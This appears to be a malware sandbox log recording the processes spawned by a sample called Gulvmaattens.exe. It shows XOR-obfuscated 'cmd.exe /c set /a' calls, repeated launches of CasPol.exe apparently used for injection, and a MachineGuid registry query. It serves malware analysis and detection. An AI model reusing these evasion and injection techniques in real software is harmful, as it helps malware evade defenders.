          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x01^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x4B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x70^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x61^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
